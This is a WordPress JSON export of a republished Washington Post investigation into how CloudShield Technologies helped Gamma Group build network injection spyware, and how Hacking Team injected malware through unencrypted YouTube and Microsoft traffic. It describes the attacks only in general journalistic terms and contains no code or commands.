{"id":46263,"date":"2014-08-18T12:00:20","date_gmt":"2014-08-18T11:00:20","guid":{"rendered":"https:\/\/www.transcend.org\/tms\/?p=46263"},"modified":"2015-05-05T21:30:43","modified_gmt":"2015-05-05T20:30:43","slug":"u-s-firm-helped-the-spyware-industry-build-a-potent-digital-weapon-for-sale-overseas","status":"publish","type":"post","link":"https:\/\/www.transcend.org\/tms\/2014\/08\/u-s-firm-helped-the-spyware-industry-build-a-potent-digital-weapon-for-sale-overseas\/","title":{"rendered":"U.S. Firm Helped the Spyware Industry Build a Potent Digital Weapon for Sale Overseas"},"content":{"rendered":"

15 Aug 2014 – <\/em>CloudShield Technologies, a California defense contractor, dispatched a senior engineer to Munich in the early fall of 2009. His instructions were unusually opaque.<\/p>\n

As he boarded the flight, the engineer told confidants later, he knew only that he should visit a German national who awaited him with an off-the-books assignment. There would be no written contract, and on no account was the engineer to send reports back to CloudShield headquarters.<\/p>\n

His contact, Martin J. Muench, turned out to be a former developer of computer security tools who had long since turned to the darkest side of their profession. Gamma Group, the British conglomerate for which Muench was a managing director, built and sold systems to break into computers, seize control clandestinely, and then copy files, listen to Skype calls, record every keystroke and switch on Web cameras and microphones at will.<\/p>\n

According to accounts the engineer gave later and contemporary records obtained by The Washington Post, he soon fell into a shadowy world of lucrative spyware tools for sale to foreign security services, some of them with records of human rights abuse.<\/p>\n

\"(Willow<\/a>

(Willow Brugh\/A diagram explaining the exploitation of YouTube users.)<\/p><\/div>\n

Over several months, the engineer adapted Gamma\u2019s digital weapons to run on his company\u2019s specialized, high-speed network hardware. Until then CloudShield had sold its CS-2000 device<\/a>, a multipurpose network and content processing product, primarily to the Air Force and other Pentagon customers, who used it to manage and defend their networks, not to attack others.<\/p>\n

CloudShield\u2019s central role in Gamma\u2019s controversial work \u2014 fraught with legal risk under U.S. export restrictions \u2014 was first uncovered by Morgan Marquis-Boire, author of a new report<\/a> released Friday by the Citizen Lab at the University of Toronto\u2019s Munk School of Global Affairs. He shared advance drafts with The Post, which conducted its own month-long investigation.<\/p>\n

The prototype that CloudShield built was never brought to market, and the company parted ways with Gamma in 2010. But Marquis-Boire said CloudShield\u2019s work helped pioneer a new generation of \u201cnetwork injection appliances\u201d sold by Gamma and its Italian rival, Hacking Team. Those devices harness malicious software to specialized equipment attached directly to the central switching points of a foreign government\u2019s national Internet grid.<\/p>\n

The result: Merely by playing a YouTube video or visiting a Microsoft Live service page, for instance, an unknown number of computers around the world have been implanted with Trojan horses by government security services that siphon their communications and files. Google, which owns YouTube, and Microsoft are racing to close the vulnerability.<\/p>\n

Citizen Lab\u2019s new report, based on leaked technical documents, is the first to document that commercial spyware companies are making active use of this technology. Network injection allows products built by Gamma and Hacking Team to insert themselves into an Internet data flow and change it undetectably in transit.<\/p>\n

The report calls that \u201chacking on easy mode,\u201d in which \u201ccompromising a target becomes as simple as waiting for the user to view unencrypted content on the Internet.\u201d<\/p>\n

Attacks of that kind were the stuff of hacker imaginings until this year, when news accounts based on documents provided by former National Security Agency contractor Edward Snowden described a somewhat similar NSA program code-named QUANTUMINSERT.<\/p>\n

\"(Willow<\/a><\/p>\n

\u201cIt has been generally assumed that the best funded spy agency in the world would possess advanced capability,\u201d the Citizen Lab report says. \u201cWhat is perhaps more surprising is that this capability is being developed by Western vendors for sale on the commercial market.\u201d<\/p>\n

Hacking Team and the company that now owns CloudShield denied any wrongdoing. Messages left with Gamma went unreturned.<\/p>\n

The \u201ccustom payload\u201d that Hacking Team uses to compromise YouTube injects malicious code into the video stream when a visitor clicks the play button. The user sees the \u201ccute animal videos\u201d he expects, according to Citizen Lab, but the malicious code exploits a flaw in Adobe\u2019s Flash video player to take control of the computer.<\/p>\n

Another attack, custom-built for use on Microsoft pages, uses Oracle\u2019s Java technology, another common browser component, to insert a back door into a victim\u2019s computer.<\/p>\n

Security and privacy advocates have identified those vulnerabilities before, but the two companies regarded them as hypothetical. In response to a bug report in September 2012, which warned of a potential YouTube attack, Google\u2019s security team responded that the use of unencrypted links to send video \u201cis expected behavior.\u201d Google closed the discussion <\/a>with the tag \u201cWontFix.\u201d<\/p>\n

\u2018Against our will\u2019<\/strong><\/p>\n

After Marquis-Boire disclosed to them confidentially last month that their services are under active attack, Google and Microsoft began racing to close security holes in networks used by hundreds of millions of users.<\/p>\n

\u201cI want to be sure there\u2019s no technical means for people to take a user\u2019s data against our will,\u201d Eric Grosse, Google\u2019s vice president for security engineering, said in an interview. \u201cIf they want to do that, they need to use legal means and we pursue that.\u201d<\/p>\n

Google and Microsoft executives said they are accelerating previous plans to encrypt their links to users across a wider range of their services. Encryption scrambles e-mail, stored files, video and other content as it travels from their servers to a user\u2019s computer or mobile device. That step, as far as security engineers know, effectively prevents most attacks in current use.<\/p>\n

Since learning of Marquis-Boire\u2019s findings in mid-July, Google has encrypted a \u201clarge majority\u201d of YouTube video links, and Microsoft has changed default settings to prevent unencrypted log-ins on most live.com<\/a> services.<\/p>\n

\u201cThere\u2019s a lot of products to update so we\u2019re not at 100 percent yet but we\u2019re actively engaged with all the teams,\u201d Grosse said, acknowledging that Google Maps, Google Earth and other services still connect to users in ways that can easily be intercepted.<\/p>\n

Grosse said comprehensive use of encryption should now be regarded as a basic responsibility of Internet services to their users.<\/p>\n

\u201cWe\u2019re probably already [encrypted] to a sufficiently high level that I would guess our adversaries are already having to scramble and shift to some other widely-used service that has not gone to SSL,\u201d he said, referring to a form of encryption called the secure socket layer, which is indicated by a padlock icon on some browsers.<\/p>\n

Matt Thomlinson, Microsoft\u2019s vice president of security, said in a statement that his company \u201cwould have significant concerns if the allegations of an exploit being deployed are true.\u201d<\/p>\n

\u201cWe have been rolling out advanced security across our web properties to continue to help protect our customers,\u201d he added.<\/p>\n

In computer circles, any unencrypted data is known as \u201ccleartext.\u201d Marquis-Boire, expanding on a theme that other security researchers have emphasized since disclosures of National Security Agency programs began 14 months ago, said \u201cthe big take-away is that cleartext is just dead.\u201d<\/p>\n

\u201cUnencrypted traffic is untrustworthy,\u201d he said. \u201cI would describe this as a sad reality of today\u2019s Internet. The techno-Utopian, libertarian ideology of the \u201990s didn\u2019t foresee that the Internet would be as militarized as it is now. People with authority and power have decided to reserve the right to \u2018own\u2019 Internet users at the core. So in order to be safe you need to walk around everywhere wrapped in encryption.\u201d<\/p>\n

\u2018Lawful intercept\u2019<\/strong><\/p>\n

The computer exploitation industry markets itself to foreign government customers in muscular terms. One Gamma brochure made public by WikiLeaks described its malware injection system, called FinFly ISP, as a \u201cstrategic, countrywide\u201d solution <\/a>with nearly unlimited \u201cscalability,\u201d or capacity for expansion. Hacking Team, similarly, says it provides \u201ceffective, easy-to-use offensive technology <\/a>to the worldwide law enforcement and intelligence communities.\u201d<\/p>\n

In rare comments to the general public, the companies use the term \u201clawful intercept\u201d to describe their products and say they do not sell to customers on U.S., European or U.N. black lists.<\/p>\n

\u201cOur software is designed to be used and is used to target specific subjects of investigation,\u201d said Eric Rabe, a U.S.-based spokesman for Hacking Team, in an extended e-mail interview. \u201cIt is not designed or used to collect data from a general population of a city or nation.\u201d<\/p>\n

He declined to discuss details of the Citizen Lab report, which is based in part on internal company documents leaked to Marquis-Boire, but he appeared to acknowledge indirectly that the material was authentic.<\/p>\n

\u201cWe believe the ongoing Citizen Lab efforts to disclose proprietary Hacking Team information is misguided, because, if successful for Citizen Lab, it not only harms our business but also gives the advantage to criminals and terrorists,\u201d he said.<\/p>\n

CloudShield\u2019s founder, Peder Jungck, who oversaw the company\u2019s relationship with Gamma before departing for a job with the British defense giant BAE Systems, did not respond to requests for comment.<\/p>\n

Confidants of the CloudShield engineer, who has since left the company after becoming disillusioned with its surveillance work, identified him as Eddy Deegan, a British citizen. Deegan\u2019s LinkedIn profile says he worked for the company as a professional services engineer during the period in question. Reached by telephone in France, Deegan declined to confirm or deny the identity of his external customer in late 2009.<\/p>\n

\u201cNothing came of the work I was involved in at the time,\u201d he said. \u201cI asked, and was assured that nothing illegal was undertaken. I have no further comment.\u201d<\/p>\n

U.S. export restrictions, enforced by the Commerce Department, require a license for any foreign sale of technology described in the relevant statute<\/a> as \u201cprimarily useful for the purpose of the surreptitious interception of wire, oral, or electronic communications.\u201d<\/p>\n

Jennifer Gephart, the media relations director for Leidos, which now owns CloudShield, declined to say whether the company had applied for an export license for the Gamma project. The transactions in question took place \u201cprior to our company\u2019s acquisition of CloudShield,\u201d she said, but \u201cto our knowledge\u201d they were \u201chandled in accordance with applicable regulations.\u201d<\/p>\n

Gephart confined her statement to the sale of CloudShield\u2019s CS-2000 hardware. When asked about the company\u2019s development of custom software to turn the device into a spyware delivery system, she declined to respond.<\/p>\n

Robert Clifton Burns, who specializes in export controls at the law firm Bryan Cave, said that \u201csurreptitious listening devices are covered and the software for that is also covered on the Commerce Control List.\u201d<\/p>\n

The regulations are complex and inconsistent, he said, and an authoritative legal judgment would require more facts. CloudShield might argue, he said, that malware injection is not \u201cprimarily useful\u201d for surreptitious eavesdropping because it can also be used to track a target\u2019s location, take photographs or steal electronic files. Although more intrusive, those attacks were not covered under the rules that applied in 2009.<\/p>\n

The Gamma Group lists no e-mail address or telephone number on its Web site. No one responded to a lengthy note left on the company\u2019s \u201cContact\u201d page.<\/p>\n

Muench, who has left his old job for a new position in France, read a LinkedIn message requesting an interview. He did not respond. In the past he has dismissed human rights concerns as unproven and defended Gamma\u2019s products as vital for saving innocent lives. \u201cThe most frequent fields of use are against pedophiles, terrorists, organized crime, kidnapping and human trafficking,\u201d he told the New York Times<\/a> two years ago.<\/p>\n

Security researchers have documented clandestine sales of Gamma and Hacking Team products to \u201csome of the world\u2019s most notorious abusers of human rights,\u201d said Ron Deibert, the director of Citizen Lab, a list that includes Turkmenistan, Egypt, Bahrain and Ethiopia.<\/p>\n

At CloudShield, executives knew the identity of at least one prospective customer for the system Deegan built. A former manager told The Post, with support from records obtained elsewhere, that CloudShield sent Deegan to Oman to plan a deployment for one of the country\u2019s internal security services. The sale did not go through.<\/p>\n

In its annual assessment of human rights that year, the State Department reported<\/a> that Oman \u201cmonitored private communications\u201d without legal process in order to \u201csuppress criticism of government figures and politically objectionable views.\u201d<\/p>\n

\u2018A push market\u2019<\/strong><\/p>\n

CloudShield did not see itself as a cloak and dagger company. It made its name for high-end hardware that could peer deeply into Internet traffic and pull out and analyze \u201cpackets\u201d of data as they flew by.<\/p>\n

The flagship product five years ago, the CS-2000, could not only look inside the data flow, but select parts of it to copy or reroute. That made it a good tool for filtering out unwanted data or blocking certain forms of cyberattack.<\/p>\n

But hardware that could block data selectively could also rewrite innocent traffic to include malicious code. That meant the CloudShield product could be used for attack as well as defense, a former executive said.<\/p>\n

CloudShield began pitching its product for offensive use, focusing on U.S. customers because of export controls.<\/p>\n

\u201cThe basic motivations are pretty straightforward,\u201d said one former senior manager there. \u201cIt was a push market. We were trying to sell boxes. It was a very conscious effort to target lawful intercept as a space where you could legitimately apply these kinds of technologies.\u201d<\/p>\n

Two former employees said that Muench, the Gamma executive, traveled to Sunnyvale in 2009 in hopes of striking a business relationship. Jungck, CloudShield\u2019s founder and chief technology officer, said he could not export that kind of technology and sent Muench home.<\/p>\n

But the leadership team reconsidered, and hit upon a plan. They believed that Deegan could do the work for Gamma without triggering U.S. export controls as long as CloudShield\u2019s U.S. operations had nothing to do with it.<\/p>\n

\u201cI think we all had qualms in the beginning,\u201d said one former executive who took part in the deliberations. \u201cI think we rationalized a way in which we felt comfortable with it. Part of that rationalization was to keep it outside the U.S., limit it to that environment where that project was.\u201d<\/p>\n

What first appeared as an absorbing technical challenge for Deegan began to take a darker cast. His prototype system could inject any of \u201c254 trojans,\u201d or all of them, into a targeted computer. If it failed once, it would keep trying, up to 65,000 times.<\/p>\n

He was proud of his technical accomplishments, he told confidants, but was no longer sure he had done the right thing. After meeting prospective customers in Oman, his qualms grew worse.<\/p>\n

In the end, the Oman deal fell through, and other efforts, with other partners failed, too. CloudShield and Gamma parted ways, and Gamma found another hardware supplier. Deegan\u2019s prototype, according to Marquis-Boire and a CloudShield insider, may have sped development of the flagship surveillance product that Gamma brought to market the following year<\/a>.<\/p>\n

[Read: How to implant a Trojan Horse: a user manual]<\/a> <\/em><\/strong><\/p>\n

_______________________________<\/p>\n

Julie Tate contributed to this report.<\/em><\/p>\n

Barton Gellman writes for the national staff. He has contributed to three Pulitzer Prizes for The Washington Post, most recently the 2014 Pulitzer Prize for Public Service.<\/em><\/p>\n

\u00a0<\/em>Go to Original \u2013 washingtonpost.com<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

His contact turned out to be a former developer of computer security tools who had long since turned to the darkest side of their profession, built and sold systems to break into computers, seize control clandestinely, and then copy files, listen to Skype calls, record every keystroke and switch on Web cameras and microphones at will; a shadowy world of lucrative spyware tools for sale to foreign security services with records of human rights abuse.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[60],"tags":[],"class_list":["post-46263","post","type-post","status-publish","format-standard","hentry","category-whistleblowing-surveillance"],"_links":{"self":[{"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/posts\/46263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/comments?post=46263"}],"version-history":[{"count":0,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/posts\/46263\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/media?parent=46263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/categories?post=46263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/tags?post=46263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}